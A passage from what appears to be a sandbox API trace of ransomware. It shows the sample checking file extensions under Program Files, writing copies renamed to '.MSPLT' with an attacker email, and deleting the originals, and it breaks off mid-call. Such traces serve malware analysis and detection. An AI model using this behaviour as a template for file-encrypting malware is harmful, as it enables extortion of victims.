lstrlenW (lpString=".pdf") returned 4 [0287.931] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString=".xls") returned 4 [0287.931] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString=".xlsx") returned 5 [0287.931] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0287.931] lstrlenW (lpString=".ppt") returned 4 [0287.931] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.931] lstrlenW (lpString=".zip") returned 4 [0287.931] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.931] lstrlenW (lpString=".rar") returned 4 [0287.931] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString=".bz2") returned 4 [0287.931] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString=".7z") returned 3 [0287.931] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.931] lstrlenW (lpString=".dbf") returned 4 [0287.931] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.931] lstrlenW (lpString=".1cd") returned 4 [0287.931] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.931] lstrlenW (lpString=".jpg") returned 4 [0287.932] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.932] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.932] lstrlenW (lpString="kor-kor.xml") returned 11 [0287.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.948] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=392) returned 1 [0287.948] CloseHandle (hObject=0x420) returned 1 [0287.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0x20 [0287.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.948] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.948] lstrlenW (lpString=".doc") returned 4 [0287.948] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.948] lstrlenW (lpString=".docx") returned 5 [0287.948] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0287.948] lstrlenW (lpString=".pdf") returned 4 [0287.948] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.948] lstrlenW (lpString=".xls") returned 4 [0287.948] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.949] lstrlenW (lpString=".xlsx") returned 5 [0287.949] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0287.949] lstrlenW (lpString=".ppt") returned 4 [0287.949] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.949] lstrlenW (lpString=".zip") returned 4 [0287.949] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.949] lstrlenW (lpString=".rar") returned 4 [0287.949] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.949] lstrlenW (lpString=".bz2") returned 4 [0287.949] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.949] lstrlenW (lpString=".7z") returned 3 [0287.949] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.949] lstrlenW (lpString=".dbf") returned 4 [0287.949] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.949] lstrlenW (lpString=".1cd") returned 4 [0287.949] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.949] lstrlenW (lpString=".jpg") returned 4 [0287.949] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.949] lstrlenW (lpString=".doc") returned 4 [0287.950] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString=".docx") returned 5 [0287.950] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0287.950] lstrlenW (lpString=".pdf") returned 4 [0287.950] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString=".xls") returned 4 [0287.950] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString=".xlsx") returned 5 [0287.950] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0287.950] lstrlenW (lpString=".ppt") returned 4 [0287.950] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.950] lstrlenW (lpString=".zip") returned 4 [0287.950] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.950] lstrlenW (lpString=".rar") returned 4 [0287.950] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString=".bz2") returned 4 [0287.950] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString=".7z") returned 3 [0287.950] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.950] lstrlenW (lpString=".dbf") returned 4 [0287.950] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.950] lstrlenW (lpString=".1cd") returned 4 [0287.950] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0287.950] lstrlenW (lpString=".jpg") returned 4 [0287.951] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.951] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.951] lstrlenW (lpString="base_altgr.xml") returned 14 [0287.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.955] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3524) returned 1 [0287.955] CloseHandle (hObject=0x420) returned 1 [0287.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0x20 [0287.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.955] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.961] lstrlenW (lpString=".doc") returned 4 [0287.961] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString=".docx") returned 5 [0287.961] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0287.961] lstrlenW (lpString=".pdf") returned 4 [0287.961] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString=".xls") returned 4 [0287.961] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString=".xlsx") returned 5 [0287.961] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0287.961] lstrlenW (lpString=".ppt") returned 4 [0287.961] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.961] lstrlenW (lpString=".zip") returned 4 [0287.961] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.961] lstrlenW (lpString=".rar") returned 4 [0287.961] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString=".bz2") returned 4 [0287.961] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString=".7z") returned 3 [0287.961] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.961] lstrlenW (lpString=".dbf") returned 4 [0287.961] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.961] lstrlenW (lpString=".1cd") returned 4 [0287.961] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.961] lstrlenW (lpString=".jpg") returned 4 [0287.961] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.962] lstrlenW (lpString=".doc") returned 4 [0287.962] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString=".docx") returned 5 [0287.962] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0287.962] lstrlenW (lpString=".pdf") returned 4 [0287.962] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString=".xls") returned 4 [0287.962] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString=".xlsx") returned 5 [0287.962] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0287.962] lstrlenW (lpString=".ppt") returned 4 [0287.962] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.962] lstrlenW (lpString=".zip") returned 4 [0287.962] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.962] lstrlenW (lpString=".rar") returned 4 [0287.962] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString=".bz2") returned 4 [0287.962] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString=".7z") returned 3 [0287.962] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.962] lstrlenW (lpString=".dbf") returned 4 [0287.962] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.962] lstrlenW (lpString=".1cd") returned 4 [0287.962] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0287.962] lstrlenW (lpString=".jpg") returned 4 [0287.962] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.963] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.963] lstrlenW (lpString="base_jpn.xml") returned 12 [0287.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.971] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=804) returned 1 [0287.971] CloseHandle (hObject=0x420) returned 1 [0287.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0x20 [0287.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0287.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0287.971] lstrlenW (lpString=".doc") returned 4 [0287.972] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.972] lstrlenW (lpString=".docx") returned 5 [0287.972] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0287.972] lstrlenW (lpString=".pdf") returned 4 [0287.972] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.972] lstrlenW (lpString=".xls") returned 4 [0287.972] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.972] lstrlenW (lpString=".xlsx") returned 5 [0287.972] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0287.972] lstrlenW (lpString=".ppt") returned 4 [0287.972] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0287.972] lstrlenW (lpString=".zip") returned 4 [0287.972] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.972] lstrlenW (lpString=".rar") returned 4 [0287.972] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.972] lstrlenW (lpString=".bz2") returned 4 [0287.972] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.972] lstrlenW (lpString=".7z") returned 3 [0287.972] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0287.983] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x401cd60, Size=0x2000) returned 0x401cd60 [0287.983] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.994] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0289.478] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.478] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0289.494] GetLastError () returned 0x0 [0289.494] ReadFile (in: hFile=0x43c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xd32, lpOverlapped=0x0) returned 1 [0289.888] WriteFile (in: hFile=0x37c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xd40, lpOverlapped=0x0) returned 1 [0289.903] ReadFile (in: hFile=0x43c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0289.904] WriteFile (in: hFile=0x37c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0289.904] SetEndOfFile (hFile=0x37c) returned 1 [0289.904] CloseHandle (hObject=0x37c) returned 1 [0289.908] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0289.908] SetEndOfFile (hFile=0x43c) returned 1 [0289.913] CloseHandle (hObject=0x43c) returned 1 [0289.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0289.914] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif")) returned 1 [0289.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.914] lstrlenW (lpString=".doc") returned 4 [0289.914] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0289.914] lstrlenW (lpString=".docx") returned 5 [0289.914] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0289.914] lstrlenW (lpString=".pdf") returned 4 [0289.914] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0289.914] lstrlenW (lpString=".xls") returned 4 [0289.915] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0289.915] lstrlenW (lpString=".xlsx") returned 5 [0289.915] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0289.915] lstrlenW (lpString=".ppt") returned 4 [0289.915] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0289.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.915] lstrlenW (lpString=".zip") returned 4 [0289.915] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0289.915] lstrlenW (lpString=".rar") returned 4 [0289.915] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0289.915] lstrlenW (lpString=".bz2") returned 4 [0289.915] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0289.915] lstrlenW (lpString=".7z") returned 3 [0289.915] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0289.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.915] lstrlenW (lpString=".dbf") returned 4 [0289.915] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0289.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.915] lstrlenW (lpString=".1cd") returned 4 [0289.915] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0289.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.915] lstrlenW (lpString=".jpg") returned 4 [0289.915] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0289.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.915] lstrlenW (lpString=".doc") returned 4 [0289.915] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0289.915] lstrlenW (lpString=".docx") returned 5 [0289.915] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0289.916] lstrlenW (lpString=".pdf") returned 4 [0289.916] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0289.916] lstrlenW (lpString=".xls") returned 4 [0289.916] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0289.916] lstrlenW (lpString=".xlsx") returned 5 [0289.916] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0289.916] lstrlenW (lpString=".ppt") returned 4 [0289.916] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0289.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.916] lstrlenW (lpString=".zip") returned 4 [0289.916] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0289.916] lstrlenW (lpString=".rar") returned 4 [0289.916] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0289.916] lstrlenW (lpString=".bz2") returned 4 [0289.916] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0289.916] lstrlenW (lpString=".7z") returned 3 [0289.916] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0289.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.916] lstrlenW (lpString=".dbf") returned 4 [0289.916] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0289.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.916] lstrlenW (lpString=".1cd") returned 4 [0289.916] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0289.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 68 [0289.916] lstrlenW (lpString=".jpg") returned 4 [0289.916] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0289.917] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0289.917] lstrlenW (lpString="AN00015_.WMF") returned 12 [0289.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0290.423] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=4734) returned 1 [0290.423] CloseHandle (hObject=0x434) returned 1 [0290.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf")) returned 0x220 [0290.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 